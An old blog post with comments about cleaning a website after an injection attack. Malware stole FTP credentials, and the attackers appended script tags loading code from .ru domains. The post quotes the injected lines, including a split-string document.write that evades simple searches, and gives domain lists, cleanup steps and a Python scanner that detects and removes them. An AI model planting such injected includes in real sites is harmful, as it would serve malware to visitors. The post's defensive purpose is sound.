
Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010

I have put together a PHP script that automatically removes all traces of this malicious code from your website. Upload the script to the root of your web directory, then open it in any browser. It supports folder and file recursion, file-extension filtering, automatic file backups, and two modes of operation: search only, and search and fix. Run it in search-only mode first and check what it reports before letting it modify anything, and delete the script from the server once you are done, since anything sitting in your web root can be reached by anyone.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have worked out how this happens: malware on your PC steals the FTP credentials for websites you have access to. The attackers then run an automated script that logs in to your site over FTP and appends a reference to their malicious JavaScript to your PHP, HTML and JS files. FTP sends the username and password in plaintext, so anything that can read your traffic or your client's saved-password store can collect them.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');

PHP or HTML files have the following appended at the very end (the domain in the script src varies; see the list below; the HTML comment that follows it is a 32-character hex marker):

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run Malwarebytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords (only after step 1, otherwise the new passwords are stolen as well)
  4. Update Java – according to this CERT KB
  5. Remove all traces of the scripts from your domains (the removal script above does this)

UPDATE (8/26/2010): Now more than just .RU domains are involved (nuttypiano.com above, for one), which means the script, which currently looks for .ru domains, won’t detect them. I’m working on a new way to detect this. Any ideas? Comment below.
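The following is an added example, written for this page in Python rather than being the author's PHP removal script. It shows one way to detect the injection without keying on the .ru TLD: match the shape of the injected markup instead of the domain, report every host it finds, and strip it with a backup. It assumes the injected code has exactly the form of the two samples above (a script tag followed by a 32-hex-digit HTML comment in PHP/HTML files, and the split document.write('<sc'+'ript ...') line in JS files); the sample files it scans are constructed here, with hosts taken from the domain list above, not captured from a real site.

```python
"""Added example, not the author's code: a TLD-agnostic scanner/cleaner for the appended
script-tag injection described in the post. Assumes the markup has exactly the shape of
the post's two samples; the host is matched generically so non-.ru domains are caught."""
import re
import shutil
import tempfile
from pathlib import Path

# PHP/HTML form: the tag plus the 32-hex-digit marker comment that follows it.
HTML_INJECT = re.compile(
    r'<script\s+type="text/javascript"\s+src="https?://([^/"]+)/[^"]*"\s*>\s*</script>'
    r'\s*<!--[0-9a-f]{32}-->[ \t]*\r?\n?',
    re.IGNORECASE,
)

# JS form: document.write() with the '<sc'+'ript' split that defeats a naive grep for "<script".
JS_INJECT = re.compile(
    r"""document\.write\(\s*'<sc'\s*\+\s*'ript[^']*?src="https?://([^/"]+)/[^"]*"[^']*?</scri'\s*\+\s*'pt>'\s*\);?[ \t]*\r?\n?""",
    re.IGNORECASE,
)

SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}


def find_injections(text):
    """Return [(kind, host), ...] for every injection present in `text`."""
    hits = [("html", m.group(1).lower()) for m in HTML_INJECT.finditer(text)]
    hits += [("js", m.group(1).lower()) for m in JS_INJECT.finditer(text)]
    return hits


def clean_text(text):
    """Strip every injection; return (cleaned_text, sorted unique hosts removed)."""
    hosts = sorted({host for _, host in find_injections(text)})
    return JS_INJECT.sub("", HTML_INJECT.sub("", text)), hosts


def scan_tree(root, fix=False, backup=True, extensions=SCAN_EXTENSIONS):
    """Walk `root` recursively; return {relative_path: [hosts]} for infected files.

    fix=False is search-only. fix=True removes the injection in place; backup=True first
    copies the original to <name>.bak so a wrong match can be reverted. Files are handled
    as latin-1 so bytes and line endings survive the round trip unchanged."""
    root = Path(root)
    report = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() not in extensions:
            continue
        cleaned, hosts = clean_text(path.read_bytes().decode("latin-1"))
        if not hosts:
            continue
        report[path.relative_to(root).as_posix()] = hosts
        if fix:
            if backup:
                shutil.copy2(path, path.with_name(path.name + ".bak"))
            path.write_bytes(cleaned.encode("latin-1"))
    return report


# Constructed samples modelled on the post's two snippets (not captured from a real site).
SAMPLE_JS = (
    "function init(){ console.log('ok'); }\n"
    "document.write('<sc'+'ript type=\"text/javascript\" "
    "src=\"http://pocketbloke.ru/Template.js\"></scri'+'pt>');\n"
)
SAMPLE_PHP = (
    "<?php echo 'hello'; ?>\n<html><body>hi</body></html>\n"
    '<script type="text/javascript" src="http://nuttypiano.com/Template.js"></script>\n'
    "<!--3848d52fcd665b3d7d96c22e5b6a5451-->\n"
)
# A legitimate external include carries no marker comment and must be left alone.
SAMPLE_CLEAN = ('<html><head><script type="text/javascript" src="http://example.com/app.js">'
                "</script></head></html>\n")


def demo():
    """Lay the samples out in a temp web root, run search-only, then fix, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "site.js").write_bytes(SAMPLE_JS.encode())
        (root / "index.php").write_bytes(SAMPLE_PHP.encode())
        (root / "clean.html").write_bytes(SAMPLE_CLEAN.encode())
        before = scan_tree(root)          # search only: nothing is modified
        scan_tree(root, fix=True)         # search and fix, with .bak backups
        return {
            "before": before,
            "after": scan_tree(root),
            "js_fixed": (root / "js" / "site.js").read_bytes().decode(),
            "php_fixed": (root / "index.php").read_bytes().decode(),
            "backups": sorted(p.name for p in root.rglob("*.bak")),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Against a real site you would call `scan_tree("/path/to/webroot")` first, review the hosts it reports (and post any new ones below), and only then rerun with `fix=True`. The patterns are deliberately tight to the markup shown above, so a variant that drops the marker comment or changes the document.write wrapping will be missed; that is the same limitation the update describes, just moved from the TLD to the markup. Cleaning the files without first cleaning the PC and changing the FTP password only buys time until the attackers' script logs in again.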

Categories: Malware, PHP, Randomness, Security
  1. Default User
    September 12th, 2010 at 10:44 | #1

    vikram solia :
    Can I safely assume now that I am free of malware and start trusting Filezilla again.

    No. If you get infected again by visiting an infected site or getting an infected email, it’ll start all over again. Use FZ by all means, but don’t store passwords in it.

  2. Clarkson
    September 15th, 2010 at 17:48 | #2

    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

  3. Default User
    September 16th, 2010 at 10:42 | #3

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

  4. Default User
    September 16th, 2010 at 10:43 | #4

    Default User :
    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

  5. September 16th, 2010 at 17:24 | #5

    Default User :
    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

    Use KeePass, and just like with FZ don’t save passwords in your browsers. Install qfxsoftware.com’s KeyScrambler to evade those sniffers :)

  6. Carlitos
    November 28th, 2010 at 08:00 | #6

    Hi…
    I’m a regular PC user like most and only use the web to access my Facebook, news etc. I don’t use any FTP clients like FZ. But the other day I checked my log after my scheduled virus scan, and there it was: pocketbloke.ru/facebook.js
    To me this indicates that somehow, somewhere, when using Facebook this happened. I cleaned up the mess as best I could by using Malwarebytes Anti-Malware and NOD32 (quarantined).
    So my questions are: Are Facebook users in danger now, and should I report this to FB HQ? And should I, to be sure, maybe reinstall my OS and change my passwords to Facebook, Windows Live Messenger etc.?

  7. December 19th, 2010 at 20:38 | #7

    “All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.”
    Can you say more about this?

  8. June 8th, 2011 at 15:29 | #8

    That is another website, pantscow.ru

  9. July 25th, 2011 at 05:28 | #9

    Hey, can we somehow edit the code of your script to add some other text
    which needs to be removed?

    I mean, if the infection is from included infections in your code.
